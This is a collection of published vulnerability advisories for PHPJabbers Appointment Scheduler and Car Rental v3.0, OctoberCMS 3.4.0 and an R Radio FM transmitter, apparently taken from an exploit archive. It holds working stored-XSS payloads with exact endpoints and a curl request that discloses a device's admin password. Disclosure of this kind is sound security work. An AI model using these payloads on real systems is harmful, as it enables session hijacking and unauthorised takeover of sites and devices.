<pre><code># Exploit Title: PHPJabbers Appointment Scheduler v3.0 - Multiple HTML Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/appointment-scheduler/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48838<br /><br />Descriptions:<br />PHPJabbers Appointment Scheduler v3.0 is vulnerable to Multiple HTML<br />Injection. HTML injection, also known as HTML code injection or<br />cross-site scripting (XSS), is a web security vulnerability that<br />allows an attacker to inject malicious code into a web page that is<br />then viewed by other users. This can lead to various attacks, such as<br />stealing sensitive information, session hijacking, defacement of<br />websites, or delivering malware to users.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to System Menu then click SMS Settings.<br />3. Then use any HTML Tag in "SMS API Key", "Default Country Code"<br />input field and Save.<br />4. You will see HTML code working here.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48838)<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Wiki_article) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from stored cross-site scripting vulnerability<br />when a user with the ability to create an article could perform a stored<br />XSS attack against any other users with the ability to create an article.<br />This can lead to execute arbitrary HTML/JS code in a user's browser session<br />in context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5807<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5807.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[content]):<br />----------------------------------<br /><br />Endpoint: /backend/tailor/entries/wiki_article<br />Payload: EntryRecord%5Bcontent%5D="<script>alert(1)</script>"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Category) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from stored cross-site scripting vulnerability<br />when a user with the ability to a category-creating feature that stores<br />data persistently could create a stored XSS attack against any other users<br />visiting the blog page. This can lead to execute arbitrary HTML/JS code<br />in a user's browser session in context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5806<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5806.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[title]):<br />--------------------------------<br /><br />Endpoint: POST /backend/tailor/entries/blog_category/create<br />Payload: EntryRecord%5Btitle%5D="</title><script>alert(1)</script>"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Blog) Stored Cross-Site Scripting Vulnerabilities<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from stored cross-site scripting vulnerability<br />when a user with the ability to a blog-creating feature that stores data<br />persistently could perform a stored XSS attack against any other users<br />visiting the blog page. This can lead to execute arbitrary HTML/JS code<br />in a user's browser session in context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5805<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5805.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (GlobalRecord[blog_name]):<br />-------------------------------------<br /><br />Endpoint: POST /backend/tailor/globals/blog_config<br />Payload: GlobalRecord%5Bblog_name%5D="</title><script>alert(1)</script>"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (Author) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from stored cross-site scripting vulnerability<br />when a user with the ability to be an author feature could perform a stored<br />XSS attack against any other users visiting the posts by the author. This<br />can lead to execute arbitrary HTML/JS code in a user's browser session<br />in context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5804<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5804.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[title]):<br />--------------------------------<br /><br />Endpoint: /backend/tailor/entries/blog_author<br />Payload: EntryRecord%5Btitle%5D ="</title><script>alert(1)</script>"<br /></code></pre>
<pre><code><br />OctoberCMS v3.4.0 (About) Stored Cross-Site Scripting Vulnerability<br /><br /><br />Vendor: October CMS<br />Product web page: https://www.octobercms.com<br />Affected version: 3.4.0<br /><br />Summary: OctoberCMS is a self-hosted content management system (CMS)<br />based on the PHP programming language and Laravel web application framework.<br />It supports MySQL, SQLite and PostgreSQL for the database back end and<br />uses a flat file database for the front end structure. The October CMS<br />covers a range of capabilities such as users, permissions, themes, and<br />plugins, and is seen as a simpler alternative to WordPress.<br /><br />Desc: OctoberCMS suffers from stored cross-site scripting vulnerability<br />when a user with the ability to edit the landing/about page. This can<br />lead to execute arbitrary HTML/JS code in a user's browser session in<br />context of an affected site.<br /><br />Tested on: macOS Monterey 12.6.3<br /> Docker 4.12.0 (85629)<br /> PHP/8.1.6<br /><br /><br />Vulnerability discovered by Nazli Soysal Kuran<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5803<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5803.php<br /><br /><br />30.10.2023<br /><br />--<br /><br /><br />Stored XSS (EntryRecord[blocks][1][content]):<br />---------------------------------------------<br /><br />Endpoint: POST /backend/tailor/entries/landing_page<br />Payload: EntryRecord%5Bblocks%5D%5B1%5D%5Bcontent%5D="<script>alert(1)</script>"<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - HTML Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48837<br /><br />Descriptions:<br />PHPJabbers Car Rental v3.0 is vulnerable to HTMl Injection. HTML<br />injection, also known as HTML code injection or cross-site scripting<br />(XSS), is a web security vulnerability that allows an attacker to<br />inject malicious code into a web page that is then viewed by other<br />users. This can lead to various attacks, such as stealing sensitive<br />information, session hijacking, defacement of websites, or delivering<br />malware to users.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to System Menu then click SMS Settings.<br />3. Then use any HTML Tag in "SMS API Key", "Default Country Code"<br />input field and Save.<br />4. You will see HTML code working here.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48837)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - Multiple Stored XSS<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, Linux<br /># CVE-2023-48836<br /><br />Descriptions:<br />PHPJabbers Car Rental v3.0 is vulnerable to Multiple Stored Cross-Site<br />Scripting. Multiple Stored XSS is a type of security vulnerability<br />that occurs when an application or website allows an attacker to<br />inject malicious scripts into the content that is permanently stored<br />on the server. Unlike reflected XSS, where the malicious script is<br />embedded in a URL and executed immediately, stored XSS involves the<br />persistent storage of the malicious script on the target server,<br />waiting for unsuspecting users to access the compromised content.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Vulnerable parameters are "name, plugin_sms_api_key,<br />plugin_sms_country_code, calendar_id, title, country name,<br />customer_name".<br />3. Go to System Menu then click SMS Settings.<br />4. Then use any XSS Payload in "SMS API Key", "Default Country Code"<br />input field and Save.<br />5. You will see popup.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48836)<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Car Rental v3.0 - CSV Injection<br /># Date: 19/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discover by: Rahad Chowdhury<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/car-rental-script/<br /># Version: v3.0<br /># Tested on: Windows 10, Windows 11, MS Office 2010<br /># CVE-2023-48835<br /><br />Descriptions:<br />PHPJabbers Car Rental v3.0 is vulnerable to CSV injection<br />vulnerability which allows an attacker to execute remote code. The<br />vulnerability exists due to insufficient input validation on the<br />Unique ID field in the Reservations list that is used to construct a<br />CSV file.<br /><br />Steps to Reproduce:<br />1. Login your panel.<br />2. Go to Options Menu then click Language then click Labels section.<br />3. Now use CSV Injection Payload in any field and go to Import/Export.<br />4. Now click export and open your system.<br /><br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48835)<br /></code></pre>
<pre><code><br />R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure<br /><br /><br />Vendor: R Radio Network<br />Product web page: http://www.pktc.ac.th<br />Affected version: 1.07<br /><br />Summary: R Radio FM Transmitter that includes FM Exciter and<br />FM Amplifier parameter setup.<br /><br />Desc: The transmitter suffers from an improper access control<br />that allows an unauthenticated actor to directly reference the<br />system.cgi endpoint and disclose the clear-text password of the<br />admin user allowing authentication bypass and FM station setup<br />access.<br /><br />Tested on: CSBtechDevice<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5802<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php<br /><br /><br />09.10.2023<br /><br />--<br /><br /><br />$ curl -s http://192.168.70.12/system.cgi<br /><html><head><title>System Settings</title><br />...<br />...<br />Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td><br />...<br />...<br />$ <br /></code></pre>
